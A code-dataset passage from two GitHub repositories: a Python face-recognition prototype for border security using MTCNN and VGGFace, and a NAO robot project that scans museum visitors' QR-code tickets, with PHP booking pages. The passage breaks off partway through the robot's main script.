RishiNanthan/Border_Security_System | https://github.com/RishiNanthan/Border_Security_System | d6977fefcb374b2624df137cb7c5ebe930888102 | 05d6f4bb6510286ba4014beaed5d6da65f68d39d | d480355e545cfb035047a73d48c2cde0cbbe2620 | refs/heads/master | 2021-04-17T11:18:17.226714 | 2020-09-27T13:56:17 | 2020-09-27T13:56:17 | 249,441,095 | 2 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.423369437456131,
"alphanum_fraction": 0.442728728055954,
"avg_line_length": 29.90441131591797,
"blob_id": "7aa2d2c6a8ccc93a5bbcb838135749a69613525d",
"content_id": "82c30759283d1681cbf8f223185fa6f13bd16c0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4339,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 136,
"path": "/VideoLocation.py",
"repo_name": "RishiNanthan/Border_Security_System",
"src_encoding": "UTF-8",
"text": "import cv2\r\nfrom mtcnn import MTCNN\r\nimport threading\r\nfrom Person import Person\r\nimport time\r\nimport PySimpleGUI as gui\r\nimport io\r\nfrom PIL import Image\r\n\r\n\r\nSIZE = 700\r\ngui.theme(\"DarkAmber\")\r\n\r\n\r\nclass Location:\r\n\r\n def __init__(self, src):\r\n self.vid = cv2.VideoCapture(src)\r\n self.img = None\r\n self.persons = []\r\n self.camera = 1\r\n if src == 0:\r\n self.camera = 0\r\n threading.Thread(target=self.read_images).start()\r\n self.detector = MTCNN()\r\n self.run()\r\n\r\n def read_images(self):\r\n _ = True\r\n while _:\r\n _, fr = self.vid.read()\r\n self.img = cv2.flip(fr, 1)\r\n\r\n def run(self):\r\n n = 0\r\n pre = time.time()\r\n _ = True\r\n while _:\r\n if self.camera:\r\n _, self.img = self.vid.read()\r\n\r\n n += 1\r\n if time.time() - pre >= 1:\r\n print(f\"{n} fps\")\r\n n = 0\r\n pre = time.time()\r\n\r\n faces, img = self.detect_faces()\r\n\r\n self.update_trackers(img)\r\n\r\n for face in faces:\r\n x, y, w, h = face[\"box\"]\r\n\r\n if face[\"confidence\"] < 0.8 or x <= 0 or y <= 0 or w <= 0 or h <= 0:\r\n continue\r\n\r\n x1, y1 = x + w, y + h\r\n found = False\r\n for person in self.persons:\r\n if person.is_same_face(x, y, x1, y1):\r\n person.set_face(x, y, x1, y1, img)\r\n found = True\r\n break\r\n if not found:\r\n person = Person(x, y, x1, y1, face, img)\r\n self.persons += [person]\r\n\r\n img = self.draw_persons(img)\r\n\r\n cv2.imshow('Border Security System', img)\r\n cv2.setMouseCallback('Border Security System', on_mouse=self.mouse_event_handler)\r\n if cv2.waitKey(1) & 0xFF == 27:\r\n break\r\n cv2.destroyAllWindows()\r\n self.vid.release()\r\n exit(1)\r\n\r\n def detect_faces(self):\r\n img = self.img\r\n return self.detector.detect_faces(img), img\r\n\r\n def draw_persons(self, img):\r\n for person in self.persons:\r\n img = cv2.rectangle(img, (person.face_x, person.face_y), (person.face_x1, person.face_y1), (0, 200, 0), 1)\r\n img = cv2.putText(img, person.name, (person.face_x, person.face_y), cv2.FONT_HERSHEY_SIMPLEX, 0.5,\r\n (0, 255, 0), 1)\r\n return img\r\n\r\n def update_trackers(self, img):\r\n persons = []\r\n for person in self.persons:\r\n if person.update_tracker(img):\r\n persons += [person]\r\n self.persons = persons\r\n\r\n def mouse_event_handler(self, type, x, y, flag, param):\r\n if type == cv2.EVENT_LBUTTONUP:\r\n for person in self.persons:\r\n if person.face_x < x < person.face_x1 and person.face_y < y < person.face_y1:\r\n\r\n name = \"\"\r\n\r\n if person.name != \"Recognising...\":\r\n face = cv2.imread(f'faces\\\\{person.name}.jpg')\r\n name = person.name\r\n else:\r\n face = person.get_face()\r\n face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)\r\n face = cv2.resize(face, (300, 300))\r\n image = Image.fromarray(face)\r\n bio = io.BytesIO()\r\n image.save(bio, format='PNG')\r\n face = bio.getvalue()\r\n\r\n layout = [\r\n [gui.T(\" \", size=(5, 1)), gui.Image(data=face)],\r\n [gui.Text(\"Name :\", size=(10, 1)), gui.InputText(name)],\r\n [gui.Text(\"ID :\", size=(10, 1)), gui.InputText()],\r\n [gui.Cancel(), gui.Ok()]\r\n ]\r\n\r\n win = gui.Window(\"Person\", no_titlebar=True, alpha_channel=0.98, resizable=True)\r\n win.Layout(layout)\r\n print(win.Read())\r\n win.Close()\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n loc = Location(0)\r\n # loc = Location(0)\r\n loc.run()\r\n except Exception as e:\r\n print(e)\r\n exit(0)\r\n"
},
{
"alpha_fraction": 0.5386971235275269,
"alphanum_fraction": 0.5618039965629578,
"avg_line_length": 28.184873580932617,
"blob_id": "1c418600cccf7e94789241eee0d10581e2cc4437",
"content_id": "fb130e2346d5a9f5218c33303dfac117329fda0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3592,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 119,
"path": "/Person.py",
"repo_name": "RishiNanthan/Border_Security_System",
"src_encoding": "UTF-8",
"text": "import cv2\r\nimport numpy as np\r\nimport threading\r\nimport os\r\nfrom keras_vggface.vggface import VGGFace\r\nfrom keras_vggface.utils import preprocess_input\r\nfrom scipy.spatial.distance import cosine\r\nimport random\r\n\r\n\r\nfaces = []\r\nfaces_dir = \"faces\"\r\nRecogniser = VGGFace(model=\"resnet50\", input_shape=(224, 224, 3), include_top=False, pooling=\"avg\")\r\n\r\n\r\nclass Person:\r\n ID = 1\r\n\r\n def __init__(self, x, y, x1, y1, properties, img):\r\n self.name = \"Recognising...\"\r\n self.name_id = f\"Person {Person.ID}\"\r\n Person.ID += 1\r\n self.face_x = x\r\n self.face_y = y\r\n self.face_x1 = x1\r\n self.face_y1 = y1\r\n self.tracker = cv2.TrackerKCF_create()\r\n self.tracker.init(img, (x, y, x1-x, y1-y))\r\n self.properties = properties\r\n self.img = img\r\n # threading.Thread(target=self.recognise_face).start()\r\n self.recognise_face()\r\n\r\n def set_face(self, x, y, x1, y1, img):\r\n self.img = img\r\n self.face_x, self.face_y, self.face_x1, self.face_y1 = x, y, x1, y1\r\n self.tracker.init(img, (x, y, x1-x, y1-y))\r\n # threading.Thread(target=self.recognise_face).start()\r\n self.recognise_face()\r\n\r\n def get_face(self):\r\n return self.img[self.face_y: self.face_y1, self.face_x: self.face_x1]\r\n\r\n def is_same_face(self, x, y, x1, y1):\r\n mx = (x + x1) // 2\r\n my = (y + y1) // 2\r\n if self.face_x < mx < self.face_x1 and self.face_y < my < self.face_y1:\r\n return True\r\n return False\r\n\r\n def recognise_face(self):\r\n global faces\r\n face = self.img[self.face_y: self.face_y1, self.face_x: self.face_x1]\r\n\r\n face = np.asarray(face, 'float32')\r\n face = preprocess_input(face)\r\n face = cv2.resize(face, (224, 224))\r\n cv2.imwrite(f'check\\\\img{random.randrange(1, 1000)}.jpg', face)\r\n encodings = Recogniser.predict([[face]])\r\n encoding = encodings[0]\r\n\r\n for i in faces:\r\n comparison = compare_faces(i.face_encoding, encoding)\r\n if comparison > 0.5:\r\n self.name = i.name\r\n break\r\n\r\n def update_tracker(self, img):\r\n self.img = img\r\n _, bb = self.tracker.update(img)\r\n x, y, w, h = (int(i) for i in bb)\r\n x1 = x + w\r\n y1 = y + h\r\n if x == y == x1 == y1 == 0:\r\n return False\r\n self.face_x, self.face_y, self.face_x1, self.face_y1 = x, y, x1, y1\r\n return _\r\n\r\n\r\nclass Face:\r\n\r\n def __init__(self, encoding, name):\r\n self.face_encoding = encoding\r\n self.name = name\r\n\r\n def __repr__(self):\r\n return self.name\r\n\r\n\r\ndef get_known_face_encodings(folder_path):\r\n global faces\r\n face_files = os.listdir(folder_path)\r\n for file in face_files:\r\n face = cv2.imread(f\"{folder_path}\\\\{file}\")\r\n\r\n face = cv2.resize(face, (224, 224))\r\n face = np.asarray(face, 'float32')\r\n face = preprocess_input(face)\r\n encodings = Recogniser.predict([[face]])\r\n faces += [Face(encodings[0], file[:-4])]\r\n\r\n print(f\"No of Faces in database : {len(faces)}\")\r\n print(\"People :\", *faces)\r\n\r\n\r\ndef compare_faces(known_encoding, unknown_encoding):\r\n \"\"\"\r\n :param known_encoding: encoding found using neural net\r\n :param unknown_encoding: encoding found using neural net\r\n :return: score of match 1 - complete match; 0 - no match;\r\n \"\"\"\r\n score = cosine(known_encoding, unknown_encoding)\r\n return 1 - score\r\n\r\n\r\nget_known_face_encodings(faces_dir)\r\n\r\nif __name__ == '__main__':\r\n pass\r\n"
},
{
"alpha_fraction": 0.8303571343421936,
"alphanum_fraction": 0.8303571343421936,
"avg_line_length": 55,
"blob_id": "fdf406b19e4b88c717366f71b613ee0d29ae2d78",
"content_id": "647d4ed2b8a5afc16fb1ab6d2475b93e59f5b4e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 2,
"path": "/README.md",
"repo_name": "RishiNanthan/Border_Security_System",
"src_encoding": "UTF-8",
"text": "# Border_Security_System\nTo create a security system that uses face recognition system for identifying persons.\n"
}
] | 3 |
mahlaNasr/nao_robot_project | https://github.com/mahlaNasr/nao_robot_project | b7a90db584fcf7ac70aa955ee4dbcc4cd33a84aa | 6c00d5b4c9f92cd0f18d7404cdbab7d78b0fc854 | a33a4fceda2d596b319b8351e2f74e00e549a53c | refs/heads/master | 2023-04-14T04:51:58.027664 | 2021-04-14T22:07:43 | 2021-04-14T22:07:43 | 353,782,749 | 0 | 0 | null | 2021-04-01T17:53:16 | 2021-04-05T17:18:59 | 2021-04-05T17:19:46 | Python | [
{
"alpha_fraction": 0.48387566208839417,
"alphanum_fraction": 0.49549680948257446,
"avg_line_length": 39.25730895996094,
"blob_id": "de5efb8c4c0c5405b90908e3a7a4f0204932ad1b",
"content_id": "edef19de2efffcdb92364a6ad14cf05d47e1544f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6884,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 171,
"path": "/scripts_frf/nao_french_project.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n##########################################################################\n# Author: Mahla Nasrollahi\n# Last Updated: 06/04/2021\n# File Name: nao_project.py\n#\n# This program with the help of other classes, asks visitors to scan their\n# QR code. Based on whether their barcode is valid or not, the robot\n# extracts its information and gives out personalised responses.\n############################################################################\n\n\n#--------------------------------------------------------------------------\n# Importing necessary packages and files\n#--------------------------------------------------------------------------\nimport nao_scan_lang as scan\nfrom Tkinter import *\nimport Tkinter as tk\nimport cv2 as cv\nimport argparse\nimport random\nimport time\nimport json\nimport os\nimport qi\n\n\n\n\nclass NaoProject():\n def __init__(self):\n # Text To Speech (tts) service\n self.tts = session.service('ALTextToSpeech')\n # Calling and creating objects for external classes\n self.scan_code = scan.NaoScanBarcode()\n\n # Getting the service ALDialog\n self.ALDialog = session.service(\"ALDialog\")\n self.ALDialog.setLanguage(\"French\")\n\n #---------------------------------------------------------------------------\n # This is the main function of this class where the robot interacts with\n # the visitors and asks them to scan their QR code. It also checks the\n # parameters that are inside the QR code and gives out specific feedback\n # regardng the inputs.\n # Argument: None\n #---------------------------------------------------------------------------\n def nao_dialog(self):\n scanning = True\n while scanning:\n # Get visitor's name\n return_name = self.scan_code.json_data(\"Name\")\n # Greet users to start the system\n hello = [\"hi\", \"hello\", \"hey\", \"greetings\"]\n self.tts.say(random.choice(hello) + \" \" + return_name)\n\n # Get specific values from the json file\n return_language = self.scan_code.json_data(\"Language\")\n\n # Check if NAO can speak the language that is picked\n if return_language == \"French\":\n self.tts.say(\"You can speak \" + return_language + \". Very cool!!\")\n else:\n self.tts.say(\"I havn't learnt that language yet. Sorry... )\")\n\n # >>> Load the french talk dialogs\n try:\n french_content = self.ALDialog.loadTopic(os.path.abspath(\"french_talk_frf.top\"))\n except:\n french_content = \"french_talk\"\n print \"[INFO] French loaded topics:\", self.ALDialog.getLoadedTopics(\"French\")\n\n # Activating the loaded topic\n self.ALDialog.activateTopic(french_content)\n self.ALDialog.subscribe('visitor_language')\n\n try:\n self.ALDialog.forceOutput()\n # Enable the GUI button to move on to next visitor\n self.next_visitor()\n print \"[INFO] Waiting for next visitor...\"\n finally:\n # stopping the dialog engine\n self.ALDialog.unsubscribe('visitor_language')\n # Deactivating topic\n self.ALDialog.deactivateTopic(french_content)\n self.ALDialog.unloadTopic(french_content)\n\n\n # Keep Running the Loop\n scanning = True\n\n\n #---------------------------------------------------------------------------\n # GUI Button to start conversation with the next visitor\n # Agument: None\n #---------------------------------------------------------------------------\n def next_visitor(self):\n def next():\n self.window.destroy()\n self.gui()\n\n self.window.title(\"Speak Again\")\n label = tk.Label(self.window,fg=\"white\", bg='#4a536b',\n text=\"Press Start To Talk To NAO\",\n font = ('calibri', 12, 'bold'),\n borderwidth = '3')\n # start button\n next_person = tk.Button(self.window, text =\"Start\",\n command = next, bg='#cbf6db',\n height=2, width=30,\n font = ('calibri', 10, 'bold'),\n borderwidth = '3')\n # To be able to exit the whole system,\n quit_btn = tk.Button(self.window, text =\"Quit\",\n command = quit, bg='#CD5C5C',\n height=2, width=30,\n font = ('calibri', 10, 'bold'),\n borderwidth = '3')\n\n # Load 10 seconds after conversation with NAO is done.\n wait_time = 5000\n self.window.after(wait_time,\n label.grid(row=0, column=5, padx=40, pady=50))\n self.window.after(wait_time,\n next_person.grid(row=1, column=5, padx=40, pady=10))\n self.window.after(wait_time,\n quit_btn.grid(row=2, column=5, padx=40, pady=10))\n mainloop()\n\n\n\n #---------------------------------------------------------------------------\n # Initialising Graphical User Interface(GUI) for scanning qr code and moving\n # on to next customer using Tkinter\n # Argument: None\n #---------------------------------------------------------------------------\n def gui(self):\n # For GUI input buttons create a window\n self.window = Tk()\n self.window.geometry(\"300x400\")\n self.window.configure(background='#4a536b')\n\n#---------------------------------------------------------------------------\n# Main function to start module sessions\n# Agument: Session\n#---------------------------------------------------------------------------\ndef main(session):\n # Creating an object of NaoProject class\n main_obj = NaoProject()\n # Calling main function of the class\n main_obj.nao_dialog()\n\nif __name__ == \"__main__\":\n # Connecting to the Choregraphe simulated robot (from Robotic Platform)\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", type=str, default=\"desktop-6d4cqe5.local\",\n help=\"Robot's IP address. If on a robot or a local Naoqi - use '127.0.0.1' (this is the default value).\")\n parser.add_argument(\"--port\", type=int, default=9559,\n help=\"port number, the default value is OK in most cases\")\n args = parser.parse_args()\n session = qi.Session()\n try:\n session.connect(\"tcp://{}:{}\".format(args.ip, args.port))\n except RuntimeError:\n print (\"\\nCan't connect to Naoqi at IP {} (port {}).\\nPlease check your script's arguments.\"\n \" Run with -h option for help.\\n\".format(args.ip, args.port))\n sys.exit(1)\n main(session)\n"
},
{
"alpha_fraction": 0.47695034742355347,
"alphanum_fraction": 0.4867021143436432,
"avg_line_length": 30.33333396911621,
"blob_id": "ef00f7765fa44ed0a60149cf2c7cd2eeb2d48e6a",
"content_id": "aaa3523db6df36603b86d9f7ecfd6cd3d140f0c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1128,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 36,
"path": "/booking_website/extras/confirmation.php",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<!-- ##########################################################################\nAuthor: Mahla Nasrollahi\nLast Updated: 11/03/2021\nFile Name: confirmation.php\n\nThis php file shows a message that a user has successfully booked when they\nclick on the \"Book Now\" button.\n############################################################################-->\n\n<html lang=\"en\" dir=\"ltr\">\n <head>\n <meta charset=\"UTF-8\">\n <title>Booking a Ticket</title>\n <!-- Import all the external links and the scripts -->\n <?php include('header.php'); ?>\n </head>\n\n <body>\n <!-- Import the navigation bar and other body parts -->\n <?php include('body_nav.php'); ?>\n\n <div class=\"main top-bar-sm tnew-content\">\n <div class=\"container\">\n <div class=\"feedback_page\">\n <?php echo \"<h1>Thank you for booking.</h1>\n <br>\n <p>Your ticket with information will be emailed to you shortly.</p>\"; ?>\n </div>\n </div>\n </div>\n\n <!-- Import footer section of the website -->\n <?php include('footer.php'); ?>\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.4193061888217926,
"alphanum_fraction": 0.42361560463905334,
"avg_line_length": 39.00862121582031,
"blob_id": "617dcf5d79460f1ea584581702710d2589559837",
"content_id": "b97347e3b7ba05b77ed95dc38cd2d04382d77dcd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4643,
"license_type": "permissive",
"max_line_length": 145,
"num_lines": 116,
"path": "/booking_website/index.php",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<!-- To access the page: http://192.168.64.2/eep/index.php -->\n\n<html lang=\"en\" dir=\"ltr\">\n <head>\n <meta charset=\"UTF-8\">\n <title>Booking a Ticket</title>\n <!-- Import all the external links and the scripts -->\n <?php include('extras/header.php'); ?>\n </head>\n\n <body>\n\n <!-- Import the navigation bar and other body parts -->\n <?php include('extras/body_nav.php'); ?>\n\n\n <div class=\"main top-bar-sm tnew-content\">\n <div class=\"container\">\n\n <!-- END INJECTED HEADER -->\n <nav class=\"tn-subnav-component\">\n <div style=\"clear: both;\"></div>\n </nav>\n\n <main class=\"tn-events-detail-page\" >\n <div>\n <div class=\"tn-event-detail__main-container\">\n <div>\n <h2>Conversations with God</h2>\n <h1><b>Jan Matejko’s Copernicus</b></h1><br/>\n </div>\n\n <!-- FORM -->\n <form action=\"extras/confirmation.php\" class=\"form-horizontal tn-ticket-selector form-signin\" method=\"POST\" id=\"form\">\n \t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t<!-- NAME -->\n \t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t<ul class=\"list-unstyled form-group\">\n \t\t\t\t\t\t\t\t\t\t\t\t<label class=\"control-label\">Name</label>\n \t\t\t\t\t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t<input class=\"form-control width\" id=\"name\" name=\"name\" type=\"text\" placeholder=\"Name\" required=\"required\">\n \t\t\t\t\t\t\t\t\t\t\t\t</div>\n \t\t\t\t\t\t\t\t\t\t</ul><br/>\n \t\t\t\t\t\t\t\t</div>\n\n \t\t\t\t\t\t\t\t<!-- Email -->\n \t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t<ul class=\"list-unstyled form-group\">\n \t\t\t\t\t\t\t\t\t\t\t\t<label class=\"control-label\">Email</label>\n \t\t\t\t\t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t<input class=\"form-control width\" id=\"email\" name=\"email\" type=\"email\" placeholder=\"Email address\" required=\"required\">\n \t\t\t\t\t\t\t\t\t\t\t\t</div>\n \t\t\t\t\t\t\t\t\t\t</ul><br/>\n \t\t\t\t\t\t\t\t</div>\n\n\n \t\t\t\t\t\t\t\t<!-- Membership Type -->\n \t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t<ul class=\"list-unstyled form-group\">\n \t\t\t\t\t\t\t\t\t\t\t\t<li class=\"ng-spacer\"></li>\n \t\t\t\t\t\t\t\t\t\t\t\t<label class=\"control-label\">Ticket Type</label>\n \t\t\t\t\t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t\t\t\t<select class=\"form-control css-sel\" id=\"ticket_type\" name=\"ticket_type\" required=\"required\">\n <option value=\"\">Choose a ticket type</option>\n <option value=\"Member\">Member</option>\n <option value=\"Standard + Variety of Donation Options\">Standard + Variety of Donation Options</option>\n <option value=\"Standard + Free\">Standard + Free</option>\n <option value=\"Standard + Under 13 for free\">Standard + Under 13 for free</option>\n \t\t\t\t\t\t\t\t\t\t\t\t\t</select>\n \t\t\t\t\t\t\t\t\t\t\t\t</div>\n \t\t\t\t\t\t\t\t\t\t</ul><br/>\n \t\t\t\t\t\t\t\t</div>\n\n\n \t\t\t\t\t\t\t\t<!-- Interests -->\n \t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t<ul class=\"list-unstyled form-group\">\n \t\t\t\t\t\t\t\t\t\t\t\t<li class=\"ng-spacer\"></li><li class=\"tn-ticket-selector__pricetype-list-item\">\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t<label class=\"control-label\">Choose an Interest</label>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<select class=\"form-control css-sel\" id=\"interests\" name=\"interests\" required=\"required\">\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<option value=\"\">Choose an option</option>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<option value=\"Artist\">About the the Artist</option>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<option value=\"History\">History of the Artist/Art</option>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<option value=\"Culture\">About the Culture</option>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t</select>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t</div>\n </li>\n \t\t\t\t\t\t\t\t\t\t</ul><br/>\n \t\t\t\t\t\t\t\t</div>\n\n \t\t\t\t\t\t</div>\n\n \t\t\t\t\t\t<div class=\"row button-row\">\n \t\t\t\t\t\t\t\t<div class=\"col-12 text-right\">\n \t\t\t\t\t\t\t\t\t\t<input name=\"submit\" id=\"submit\" class=\"btn btn-next btn-primary btn-primary-blue\" type=\"submit\" value=\"Book Now\" />\n \t\t\t\t\t\t\t\t</div>\n \t\t\t\t\t\t</div>\n \t\t\t\t</form>\n </div>\n </div>\n </main>\n </div>\n\n\n <!-- jQuery for getting data for QR code -->\n <script src=\"input_variables.js\"></script>\n\n\n\n <?php include('extras/footer.php'); ?>\n\n\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.4765421450138092,
"alphanum_fraction": 0.488010436296463,
"avg_line_length": 42.59848403930664,
"blob_id": "719852660aff514e304a0f4a749a3d24eba615d1",
"content_id": "ee4156840a390c02425f1800de9458c1a819f317",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11510,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 264,
"path": "/scripts_enu/nao_project.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n##########################################################################\n# Author: Mahla Nasrollahi\n# Last Updated: 06/04/2021\n# File Name: nao_project.py\n#\n# This program with the help of other classes, asks visitors to scan their\n# QR code. Based on whether their barcode is valid or not, the robot\n# extracts its information and gives out personalised responses.\n############################################################################\n\n\n#--------------------------------------------------------------------------\n# Importing necessary packages and files\n#--------------------------------------------------------------------------\nimport nao_talk as talk\nimport nao_scan as scan\nfrom Tkinter import *\nimport Tkinter as tk\nimport cv2 as cv\nimport argparse\nimport random\nimport time\nimport json\nimport os\nimport qi\n\n\n\n\nclass NaoProject():\n def __init__(self):\n # Text To Speech (tts) service\n self.tts = session.service('ALTextToSpeech')\n # Calling and creating objects for external classes\n self.scan_code = scan.NaoScanBarcode()\n self.dialogs = talk.NaoDialogs()\n\n # Getting the service ALDialog\n self.ALDialog = session.service(\"ALDialog\")\n self.ALDialog.setLanguage(\"English\")\n\n #---------------------------------------------------------------------------\n # This is the main function of this class where the robot interacts with\n # the visitors and asks them to scan their QR code. It also checks the\n # parameters that are inside the QR code and gives out specific feedback\n # regardng the inputs.\n # Argument: None\n #---------------------------------------------------------------------------\n def nao_dialog(self):\n scanning = True\n while scanning:\n # Greet users to start the system\n hello = [\"hi\", \"hello\", \"hey\", \"greetings\"]\n self.tts.say(random.choice(hello))\n\n # >>> Load ticket scan dialogue\n try:\n qrcode_content = self.ALDialog.loadTopic(os.path.abspath(\"ticket_scan_enu.top\"))\n except:\n qrcode_content = \"ticket_scan\"\n print \"[INFO] English loaded topics:\", self.ALDialog.getLoadedTopics(\"English\")\n # Activating the loaded topic\n self.ALDialog.activateTopic(qrcode_content)\n self.ALDialog.subscribe('nao_conversation')\n\n try:\n # Enable GUI button for users to press for scanning\n def yes():\n self.ALDialog.forceInput(\"have_ticket\")\n self.window.destroy()\n # User has no ticket\n def no():\n self.ALDialog.forceInput(\"no_ticket\")\n self.gui()\n self.window.title(\"Ticket Check\")\n # Label of the box\n label = tk.Label(self.window, fg=\"white\", bg='#4a536b',\n text = \"Do you have a ticket?\",\n font = ('calibri', 12, 'bold'),\n borderwidth = '3')\n # Yes Button\n yes_btn = tk.Button(self.window,\n text =\"Yes - Ready for Scanning QR Code\",\n command = yes, bg='#9bc472',\n height=2, width=30,\n font = ('calibri', 10, 'bold'),\n borderwidth = '3')\n # No button\n no_btn = Button(self.window, text = \"No\",\n \t\t command = no, bg='#ff9a8d',\n height=2, width=30,\n font = ('calibri', 10, 'bold'),\n borderwidth = '3')\n\n # Load 4 seconds amount after conversation with NAO is done.\n wait_time = 4000\n self.window.after(wait_time,\n label.grid(row=0, column=5, padx=40, pady=50))\n self.window.after(wait_time,\n yes_btn.grid(row=1, column=5, padx=40, pady=10))\n self.window.after(wait_time,\n no_btn.grid(row=2, column=5, padx=40, pady=10))\n mainloop()\n\n finally:\n # stopping the dialog engine\n self.ALDialog.unsubscribe('nao_conversation')\n # Deactivating topic\n self.ALDialog.deactivateTopic(qrcode_content)\n self.ALDialog.unloadTopic(qrcode_content)\n\n try_again = [\"Sorry I couldn't read that. Can I see your ticket again?\",\n \"Let me scan again, try to keep your hand steady.\",\n \"Please scan again, try to come closer to the camera.\",\n \"That was blurry, please try again.\",\n \"Please make sure that your brightness is about 50% then try again.\"]\n\n scan_again = True\n while(scan_again):\n # Check if barcode is clear and can be decoded\n self.scan_code.scan_qrcode()\n\n # Check of barcode is readable and clear\n if self.scan_code.check_readable() is True:\n print \"[INFO] Done scanning.\"\n self.tts.say(\"Thank you. Your barcode has been successfully scanned.\")\n cv.destroyAllWindows()\n #Get specific values from the json file\n return_interest = self.scan_code.json_data(\"Interest\")\n\n # Getting random conversation strings from NaoDialogs class\n interest_option = self.dialogs.intro_interest()\n speech = self.dialogs.interest_talk(return_interest)\n\n # Check if the QR code is a valid one\n if return_interest == \"Artist\" or return_interest == \"History\" or return_interest == \"Culture\":\n self.tts.say(interest_option + str(return_interest) + \". \" + speech)\n scan_again = False\n else:\n self.tts.say(\"Your barcode is invalid. Please try again.\")\n scan_again = True\n else:\n self.tts.say(random.choice(try_again))\n # Close scanning window\n cv.destroyAllWindows()\n cv.waitKey(1)\n\n # Checking if a visitor has membership or not\n return_tickType = self.scan_code.json_data(\"ticket_type\")\n\n # >>> Load the welcome talk dialogs\n self.tts.say(\"Anyway, now you know something about what you were interested in!\")\n try:\n welcome_content = self.ALDialog.loadTopic(os.path.abspath(\"welcome_talk_enu.top\"))\n except:\n welcome_content = \"welcome_talk\"\n print \"[INFO] English loaded topics:\", self.ALDialog.getLoadedTopics(\"English\")\n\n # Activating the loaded topic\n self.ALDialog.activateTopic(welcome_content)\n self.ALDialog.subscribe('welcome_visitor')\n\n if return_tickType != \"Member\":\n self.ALDialog.forceInput(\"no_membership\")\n else:\n self.ALDialog.forceInput(\"yes_membership\")\n\n try:\n # Delete the JSON file and its information from system when\n # finished talking to a visitor\n self.scan_code.remove_json()\n # Enable the GUI button to move on to next visitor\n self.next_visitor()\n print \"[INFO] Waiting for next visitor...\"\n finally:\n # stopping the dialog engine\n self.ALDialog.unsubscribe('welcome_visitor')\n # Deactivating topic\n self.ALDialog.deactivateTopic(welcome_content)\n self.ALDialog.unloadTopic(welcome_content)\n\n # Keep Running the Loop\n scanning = True\n\n\n #---------------------------------------------------------------------------\n # GUI Button to start conversation with the next visitor\n # Agument: None\n #---------------------------------------------------------------------------\n def next_visitor(self):\n def next():\n self.window.destroy()\n self.gui()\n\n self.window.title(\"Next Visitor\")\n label = tk.Label(self.window,fg=\"white\", bg='#4a536b',\n text=\"Press Start To Talk To NAO\",\n font = ('calibri', 12, 'bold'),\n borderwidth = '3')\n # start button\n next_person = tk.Button(self.window, text =\"Start\",\n command = next, bg='#cbf6db',\n height=2, width=30,\n font = ('calibri', 10, 'bold'),\n borderwidth = '3')\n # To be able to exit the whole system,\n quit_btn = tk.Button(self.window, text =\"Quit\",\n command = quit, bg='#CD5C5C',\n height=2, width=30,\n font = ('calibri', 10, 'bold'),\n borderwidth = '3')\n\n # Load 10 seconds after conversation with NAO is done.\n wait_time = 10000\n self.window.after(wait_time,\n label.grid(row=0, column=5, padx=40, pady=50))\n self.window.after(wait_time,\n next_person.grid(row=1, column=5, padx=40, pady=10))\n self.window.after(wait_time,\n quit_btn.grid(row=2, column=5, padx=40, pady=10))\n mainloop()\n\n\n\n #---------------------------------------------------------------------------\n # Initialising Graphical User Interface(GUI) for scanning qr code and moving\n # on to next customer using Tkinter\n # Argument: None\n #---------------------------------------------------------------------------\n def gui(self):\n # For GUI input buttons create a window\n self.window = Tk()\n self.window.geometry(\"300x400\")\n self.window.configure(background='#4a536b')\n\n#---------------------------------------------------------------------------\n# Main function to start module sessions\n# Agument: Session\n#---------------------------------------------------------------------------\ndef main(session):\n # Creating an object of NaoProject class\n main_obj = NaoProject()\n # Calling main function of the class\n main_obj.nao_dialog()\n\nif __name__ == \"__main__\":\n # Connecting to the Choregraphe simulated 